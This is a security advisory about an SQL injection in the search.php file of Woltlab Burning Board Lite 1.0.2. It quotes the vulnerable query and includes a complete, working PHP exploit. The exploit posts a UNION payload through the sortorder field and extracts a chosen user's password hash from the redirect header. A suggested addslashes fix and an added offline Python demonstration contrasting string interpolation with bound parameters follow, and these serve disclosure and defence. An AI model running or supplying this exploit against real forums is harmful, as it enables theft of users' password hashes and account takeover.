[EN] securityvulns.ru

From: nbbn_(at)_gmx.net <nbbn_(at)_gmx.net>
Date: 21.12.2007
Subject: Woltlab Burning Board 1.0.2 SQL-Injection Vulnerability

Woltlab Burning Board Lite 1.0.2 contains an SQL injection vulnerability in the file
search.php, lines 510-515:

if(!$savepostids) eval("error(\"".$tpl->get("error_searchnoresult")."\");");
 $result=$db->query_first("SELECT searchid FROM bb".$n."_searchs WHERE postids='$savepostids' AND showposts='$_POST[showposts]' AND sortby='$_POST[sortby]' AND sortorder='$_POST[sortorder]' AND userid='$wbbuserdata[userid]' AND ipaddress='$REMOTE_ADDR'");
 if($result['searchid']) {
  header("Location: search.php?searchid=$result[searchid]&sid=$session[hash]");
  exit();
 }

$_POST[showposts], $_POST[sortby] and $_POST[sortorder] are interpolated into the query
without addslashes() or any other escaping, so a single quote in any of them closes the
string literal and the rest of the value is parsed as SQL. The query only runs once the
search has matched at least one post ($savepostids is set), so an attacker needs a search
string that returns results. A UNION injected through sortorder makes query_first() return
the chosen user's password hash as searchid, and search.php then reflects it in the
Location redirect, where it can be read from the response.


== Exploit ==
<?php
// Check the argument count before using the arguments.
if ($argc <= 4) {
    echo "Usage: filename.php [host] [path] [searchstring] [user-id]\n Examples:\n"
       . " php filename.php localhost /wbblite/search.php Computer 1\n"
       . " php filename.php localhost /search.php Board 1\n";
    die;
}
$host = $argv[1];
$path = $argv[2];
$searchstring = urlencode($argv[3]);   // must match at least one post
$userid = $argv[4];

// POST body; sortorder carries the injection, URL-decoded:
//   ' UNION SELECT password FROM bb1_users WHERE userid=<user-id> /*
$sqlinjecting = "searchstring=$searchstring&searchuser=&name_exactly=1&boardids%5B%5D=*"
    . "&topiconly=0&showposts=0&searchdate=0&beforeafter=after&sortby=lastpost"
    . "&sortorder=%27%20UNION%20SELECT%20password%20FROM%20bb1_users%20WHERE%20userid="
    . "$userid%20/*&send=send&sid=&submit=Suchen";

$con = fsockopen($host, 80, $errno, $errstr, 10);
if (!$con) {
    die("Could not connect to $host: $errstr ($errno)\n");
}
echo "==Woltlab Burning Board LITE SQL-Injection Exploit found and coded by NBBN.\n\n\n";
sleep(1);
// HTTP header lines end with CRLF.
fputs($con, "POST $path HTTP/1.1\r\n");
fputs($con, "Host: $host\r\n");
fputs($con, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($con, "Content-length: " . strlen($sqlinjecting) . "\r\n");
fputs($con, "Connection: close\r\n\r\n");
fputs($con, $sqlinjecting);

$res = '';
while (!feof($con)) {
    $res .= fgets($con, 128);
}
echo "Well done...\n";
fclose($con);

echo $res;
// The hash is reflected in the redirect: Location: search.php?searchid=<hash>&sid=...
echo "The password-hash is in search.php?searchid=[Hash]\n";
$the_hash = substr($res, strpos($res, 'searchid=') + 9, 32);
echo "Hash: $the_hash\n\n";
?>


== Fix ==

if(!$savepostids) eval("error(\"".$tpl->get("error_searchnoresult")."\");");
 $result=$db->query_first("SELECT searchid FROM bb".$n."_searchs WHERE postids='$savepostids' AND showposts='".addslashes($_POST['showposts'])."' AND sortby='".addslashes($_POST['sortby'])."' AND sortorder='".addslashes($_POST['sortorder'])."' AND userid='$wbbuserdata[userid]' AND ipaddress='$REMOTE_ADDR'");
 if($result['searchid']) {
  header("Location: search.php?searchid=$result[searchid]&sid=$session[hash]");
  exit();
 }
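The following is an added Python example, not part of the original advisory and not
Woltlab code. It rebuilds the search.php query against an in-memory SQLite database so
the effect of the exploit's sortorder payload and of a hardened query can be checked
offline. Everything in it is constructed: the bb1_ table prefix (hard-coded in the
exploit above), a single user whose stored hash is md5("password"), one legitimate saved
search with searchid 17, and fixed values for $savepostids, userid and REMOTE_ADDR. The
hardened version uses bound parameters rather than addslashes().

```python
import re
import sqlite3

# Constructed fixture (not real data): md5("password")
USER_HASH = "5f4dcc3b5aa765d9d8f62a62c6d5d1ca"

# Server-side values the original code takes from the session/request.
SAVEPOSTIDS, USERID, IPADDR = "42", 1, "127.0.0.1"

# A normal request and the URL-decoded sortorder value sent by the exploit.
BENIGN = {"showposts": "0", "sortby": "lastpost", "sortorder": "DESC"}
PAYLOAD = {"showposts": "0", "sortby": "lastpost",
           "sortorder": "' UNION SELECT password FROM bb1_users WHERE userid=1 /*"}


def make_db():
    """In-memory stand-in for the board's bb1_users and bb1_searchs tables."""
    con = sqlite3.connect(":memory:")
    con.executescript(f"""
        CREATE TABLE bb1_users (userid INTEGER, password TEXT);
        CREATE TABLE bb1_searchs (searchid INTEGER, postids TEXT, showposts TEXT,
                                  sortby TEXT, sortorder TEXT, userid INTEGER,
                                  ipaddress TEXT);
        INSERT INTO bb1_users VALUES (1, '{USER_HASH}');
        INSERT INTO bb1_searchs VALUES (17, '42', '0', 'lastpost', 'DESC', 1, '127.0.0.1');
    """)
    return con


def query_first_vulnerable(con, post):
    """Mirror of the original search.php query: raw string interpolation."""
    sql = ("SELECT searchid FROM bb1_searchs WHERE postids='%s' AND showposts='%s' "
           "AND sortby='%s' AND sortorder='%s' AND userid='%s' AND ipaddress='%s'"
           % (SAVEPOSTIDS, post["showposts"], post["sortby"], post["sortorder"],
              USERID, IPADDR))
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def query_first_fixed(con, post):
    """Same query with bound parameters: the input never reaches the SQL parser."""
    sql = ("SELECT searchid FROM bb1_searchs WHERE postids=? AND showposts=? "
           "AND sortby=? AND sortorder=? AND userid=? AND ipaddress=?")
    row = con.execute(sql, (SAVEPOSTIDS, post["showposts"], post["sortby"],
                            post["sortorder"], USERID, IPADDR)).fetchone()
    return row[0] if row else None


def redirect_for(searchid):
    """The Location header search.php emits after a successful query_first()."""
    return f"Location: search.php?searchid={searchid}&sid="


def hash_from_location(header):
    """A leak shows up as 32 hex chars where a numeric searchid is expected."""
    m = re.search(r"searchid=([0-9a-f]{32})(?:&|$)", header)
    return m.group(1) if m else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, benign :", query_first_vulnerable(db, BENIGN))
    leaked = query_first_vulnerable(db, PAYLOAD)
    print("vulnerable, payload:", leaked)
    print("hash in redirect   :", hash_from_location(redirect_for(leaked)))
    print("fixed, benign      :", query_first_fixed(db, BENIGN))
    print("fixed, payload     :", query_first_fixed(db, PAYLOAD))
```

With the payload, the first SELECT matches nothing, the injected UNION returns the
user's hash as the single column, and the trailing /* comments out the userid and
ipaddress conditions; with bound parameters the same value is just a sortorder string
that matches no row. Note that addslashes() relies on MySQL treating a backslash as an
escape character; SQLite, for one, escapes quotes by doubling them and treats the
backslash literally, so the advisory's fix is specific to MySQL in its default mode,
whereas parameter binding does not depend on the database's quoting rules.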

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod